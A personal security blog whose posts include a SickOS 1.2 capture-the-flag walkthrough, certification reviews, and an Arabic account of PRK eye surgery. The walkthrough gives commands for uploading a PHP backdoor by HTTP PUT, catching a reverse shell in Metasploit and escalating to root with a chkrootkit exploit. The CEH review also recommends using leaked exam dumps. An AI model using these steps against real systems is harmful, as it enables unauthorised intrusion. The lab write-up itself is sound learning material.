Uncategorized

Mini SOC Project

I’m glad to announce my Graduation Project in Applied Science Private University is done!

and It will go live very soon!

#MiniSOC is a Cloud Solution for vulnerability assessment where you can scan your website, Or any connected device on the internet! , integrated with the latest technology on cloud computing.

#AWS #cloudflare #soc

#cybersecurity #pentest #vulnerability

#vulnerabilityassessment #securityautomation #security

miniSOC.png

 

Advertisements
Uncategorized

عملية تصحيح النظر P.R.K

prk.jpg

بالبداية للتوضيح يوجد عدة عمليات للتصحيح بين الليرز والليزك والفيمتو ليزك أما شرح عمليتنا هي P.R.K

عملية مطورة عن الليزك، لا يوجد أفضل وإنما اختلاف تقنيات لعلاج القرنية

محتوى المدونة عن تجربتي الشخصية وليس مرجع طبي معتمد

 عملية (P.R.K)

Photorefractive Keratectomy

وهي عبارة عن اقتصاص طبقة من القرنية ليعود تحدبها لوضعه الطبيعي وبذلك تتصحح الرؤية

نتيجة بحث الصور عن ‪prk‬‏

بالمرحلة الأولى تخدير العين

المرحلة الثانية قص طبقة علوية من القرنية باستخدام الليزر عن طريق جهاز بدون إحساس بالألم

المرحلة الثالثة يقوم الطبيب بإزالة الطبقة القديمة من القرنية

المرحلة الرابعة إضافة عدسة شفافة مؤقتة لمدة 3 أيام حتى تلتئم القرنية ولحماية منطقة الجرح

قبل العملية تأكد من قياس عمق القرنية وأنها تسمح لإجرائها

      تزداد خطورة حدوث إزاحة بالقرنية ولا يمكن إجراء العملية (300  – 270)

ومن المفترض أن يكون العمق 300 فأكثر وبالتأكيد هذا باستشارة الطبيب

فيما يلي صورة لرؤية المريض قبل وبعد العملية

PRK.png

من اليسار قبل إجراء العملية وبدون لبس النظارات

في الوسط بعد العملية من يوم إلى ثلاثة أيام تشعر بوجود ماء بينك وبين الرؤية

في اليمين تتحسن الرؤية وتصبح بهذا الشكل من فترة أسبوع حتى ثلاثة أسابيع

يعود النظر الطبيعي بشكل تدريجي من أسبوع حتى شهر

الأسبوع الأول %25

الأسبوع الثاني %50

الأسبوع الثالث %80

الأسبوع الرابع %100

العملية تستغرق 10 دقائق لكلا العينين

بعد إجراء العملية قد لا تستطيع رؤية الإضاءات الناصعة بما في ذلك الشمس وشاشة الهاتف والتلفاز

ستشعر بالرغبة بعرك العينين ولكن حك العينين ممنوع حتى إزالة العدسات

ينصح بأخذ استحمام قبل الذهاب للمستشفى فلن تستطيع غسل عينيك قبل أسبوع بعد إجراء العملية

ولأنك ستكره الإضاءات ستضع نظارات شمسية تقي من الإضاءة والغبار ليومين بعد العملية

c69e375c-e9d9-4c97-b87b-5a9a77528083-588-00000034af798fe3_file

ستأخذ ثلاث أنواع من قطرات العيون (مضاد حيوي – مرطب – قطرة لتصفية الرؤية)

!إذا كان الحاسب الآلي يتضمن عملك اليومي أو الدراسي فتكبير الشاشة 200% سيكون حلاً رائعاً لترى بوضوح

نصيحة أخيرة، أنا كنت قد شاهدت العملية قبل دخولي عبر حساب سناب شات الطبيب فلا أنصحك بهذا

قد تشعر بوهم الألم قبل دخولك للعملية وفي الواقع وأثناء العملية ستكون تحت تأثير المخدر ولن تشعر بآلام

 

شرح لطريقة العملية

مراجع:

https://www.katzeneye.com/what-is-prk/

https://www.allaboutvision.com/visionsurgery/prk.htm

 

Information Security

SickOS 1.2 Walkthrough

 

SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for local IP via netdiscover command:
Netdiscover 
IP: 192.168.236.136
It may different in your lab,
1.png
Scan the IP target with nmap as default:
nmap -A -vv -T4  192.168.236.136
2.png
We detect two ports are open 22/tcp and 80/tcp
Scan all TCP ports and for faster usage we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target: 192.168.236.136
  • Choose from profile: Intense scan, all TCP ports
As showing in screen shot:
nmap -p 1-65535 -T4 -A -v 192.168.236.136
3.png
Scan all UDP ports
  • Type the IP in target: 192.168.236.136
  • Choose from profile:Intense scan plus UDP
4
We didn’t find useful ports from UDP scan, So we go back to TCP scan.
After we determined the target has 80 port is open so we will browse it.
We run nikto -h to scan the web and detect directory in that host:
    nikto -h 192.168.236.136
5.png
After there is now useful result we run dirbuster with medium word-list
dirubuster to find directories in different tool,
  • Type http://192.168.236.136in the target textfiled.
  • Check Go Faster for speed process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
6.png
Then we detect “test” directory let’s open it in browser
Let’s analyze the page and open view source,
nothing useful, So we can analyze the server side command either via burpsuite or via curl command and use OPTIONS to determine web functions are allowed
#curl -v -X OPTIONS http://192.168.236.136/test
7.png
After we detect that PUT command is allowed, we can put our shell either via burpsuite or via Nmap,
Let us generate shell first
I use ready shell in kali by default using:
    locate shell
8.png
Copy shell and rename it as shell.php
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit the shell.php via command:
    nano shell.php
9.png
$ip=’192.168.236.135′ 
    >> kali IP
$port 443 
    >> because 4444 isn’t working
nmap -p 80 192.168.236.136 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’shell.php’
10.png
Successfully created!
Now we have to make listener, in two different way nc -lvp 443 or  metasploit but i prefer metasploit for Privilege Escalation later,
We use payload php/reverse_php  because we generate shell no meterpreter and that works for me,
Set local host (kali IP) and port (443) as we did in shell previously.
Then we type exploit (-jz) to work session in background.
msfconsole
use exploit/multi/handler
set payload php/reverse_php
set LHOST192.168.236.136
set LPORT 442
exploit -jz
11.png
Final options:
12.png
Then we move to this shell via browser:
13.png
Finally we got a user shell!
But with normal user www-data
14.png
For Privilege Escalation first we check the current process running and has root privileges:
ls -la
15.png
We saw that linechkrootkit has root privileges,
drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After figure out for vulnerability in Google we discovered:
vulnerability of chkrootkit CVE-2014-0476 this could allow me to escalate my privilge.
with metasploit module.
  • use exploit/unix/local/chkrootkit
  • set session 1
After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such a 8080 and run the module.
for me i set session 3 because i already opened sessions 1 and 2.
16.png
Type
>Info
17.png
Make sure about lport with options command:
18.png
Then type run
19.png
session 4 opened ! in my case,
Type id 
To see the privilege account
20.png
Now we are root!
open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text for final flag:
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
21.png
I Hope you enjoy it!
contact me twitter:
Information Security

ECSA v10 Review

ECSA ( EC-Council Security Analyst) v10 Review:

 

Hi there,

Today I will write about ECSA it’s an advanced penetration testing course (EC-Council Security Analyst),

You can find official website of this course here:

www.eccouncil.org/programs/certified-security-analyst-ecsa/

 

This write-up describes my experience and not necessarily be the all parts. Let’s move to the pre-request of this course:

You need CEH (course and practical course) in the new version 10,
I had CEHv9 on Dec/2017,

The Course:
This course extends your knowledge from just knowing the information and tools to use the information that you learnt in CEH and reuse the tool with some advanced technique.

When you look to the syllabus of ECSA you will see the interesting topics such as cloud hacking, IOT hacking and Database Hacking, Internal and external penetration testing but the truth is different.

The Benefits:

To be honest the gold key in this course is to teach you how to get engaged with security industry and how to apply for Pen Test project and complete all business papers pre and post proposal.

As EC-Council always does, their courses contain a lot of theoretical knowledge comparing to the practical phase and that’s what makes them not good enough to take their courses.

ECSA v10 has 16 modules + 10 of self-study, all of them is just slide show.
If you are looking for just deep information you can enroll it.

The practical section contains a website named iLab,
iLab is a virtual environment has windows (server / 8 / 10) and kaliubuntu – backtrack divided as company departments to apply all the labs.

My Experience:
Ok, for now we learnt all the outline of the course, but we didn’t get my experience and recommendations of ECSA as well,

I am planning to take OSCP but I didn’t feel my PenTest skills as advanced enough after CEH to go for OSCP and that’s why I took ECSA to improve my current Penetration Test experience.

The course, as I mentioned, contains a lot of theoretical information regard to practical,So, if you are looking for Penetration testing practical course you shouldn’t be here.

The course repeats many labs from CEH which is bad for me. I expected more advanced techniques rather than just use old and expired tools and repeat exactly CEH labs and hacking with Metasploit.

To mention some detailed example the Nmap has one more bash script to scan which is new for me and one exploit editing.

The module contains some repeated labs if we investigate cloud you will apply XSS attack than was in web module.
If you look for Database lab you will re-use sql injection but here just to retrieve database table.

I faced a lot of issues in sql labs that does not working. In addition, when I contact lab-support they delayed replying and finally the answer is to forward the issue to the related department and that’s it.

The screenshots and results showing while I’m applying are very different,
In Wi-Fi hacking as we all now, the known scenario to break Access Point or even to penetrate router from outside to get into local network,

But the truth is, making virus for old android devices and then break 4-way hand-shaking but the truth is too far from just WIFI hacking!

In version 10 they removed Report writing and hacking challenges and separated to other course they call it ECSA Practical for commercial reason.

After all I finished the lab and for my first time I am not satisfying with this course, so I don’t recommend any one who need advanced penetration testing course to enroll it.

I only recommend it for the manager or who need just knowledge to work with pen tester not to work penetrate.

When I evaluate the training course they forward all the notes to training center instead to read it and investigate the reason and try to fix it.

 

Uncategorized

Certified Ethical Hacker Review (CEHv9)

 

This is my first review of an international course and exam,

I will write about preparation to this course,

صورة ذات صلة

Beginning:

First of all you need to be in the IT environment such as student or employee other that you have to take external courses such Data Base and web programming language,  Operating Systems, finally and the must is computer networks.

  • The above courses are mentioned for non IT people or if you are you have been familiar with SQL, Computer Network,
  • You can take it from (CCNA, Network+), basic web programming language so that you can edit HTML code or PHP in advanced.
  • Basic Linux Command that will help you in Kali-Linux Labs, don’t worry 80% of the course applied on windows server 😉

 

The Course:

CEH have 18 module talks about technology and how you can secure it from several attacks,

That include:

  1. Information Gathering.
  2. Network Scanning.
  3. Enumeration.
  4. System Hacking.
  5. Web Hacking.
  6. SQL Injection.
  7. Wireless Hacking.
  8. Cloud Computing.
  9. IOT Hacking (New).
  10. Vulnerability (Assessment).
  11. WIFI Hacking.
  12. Sniffing.
  13. Malware Threats.
  14. Mobile Hacking
  15. Evading Firewall, IDS, IPS.
  16. Cover Tracking.

Basically this just a brief of the course outline.

My journey talk around 2 month of course attendants and for preparation for the exam around 3 month to read and apply all   materials covered.

I had CEHv9 and i faced a lot of expired tool and labs, don’t worry just google the command or topic lab and you will find the alternative command,

You will face old attacks such as SSL Strip to sniff the Facebook password because they changed the protocol used to transfare credentials over local network.

The course is really awesome it gives you the full knowledge of hacking in the real word example, But all you need to keep the follow-up with your instructor because you will take a lot of information.

In additions of a lot of information, The applied labs will covet the important topic like system hacking and introduce of technology like cloud computing.

Your book is your friend, The CEH book will cover every basic information also you can ask EC-Council support to help you with any issue.

 

The Exam:

CEH exam has 125 Question all of them is multiple choice, focusing on all material, and important topic such as

  • Nmap parameter around 5 questions.
  • Hacking Ethics.
  • XSS, CRF, SQL.
  • Linux Command.
  • WIFI table and ranges.
  • Scenario Based Question.

The secret key of final exam that you can look for Dump and take an idea for the exam and it my cover around 60% of the exam depends of the dump release date.

You need to apply all labs to make sure you have covered all knowledge in the course.

There is no practical question in the exam.

The exam is web app online not like other offline emulator environment.

Finally:

This course is for beginner and the opening door for penetration testing and  information security career,

you can complete in this next track via ECSA (Security Analyst) , and LPT (Master Penetration Testing).

Happy Hacking!

 

Abdulghani Alkhateeb

CEHv9, CCNA, Network System Student @ A.S.U

Find me on Twitter

Or Contacts

Uncategorized

Jordan InfoSec CTF-01 walkthrough

Jordan InfoSec CTF-01 Walkthrough

JIS-CTF

Hello All,

Today I will write my first walkthrough of easy VM.

Jordan InfoSec.

First to download the vm from VM here:

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

This challenge have 5 flags you need to use some inux and

basic hacking techniques to find the flags,

you may need for this command during this challenge

{ls -a :to look for hidden files}

{ls -l :to look for permissions}

{find -name :to look for find files}

{cat  :to open text files}

I wrote it in pdf to minimize the size of uploading 😉

Good Luck!

Jordan InfoSec CTF-01 Walkthrough

Contact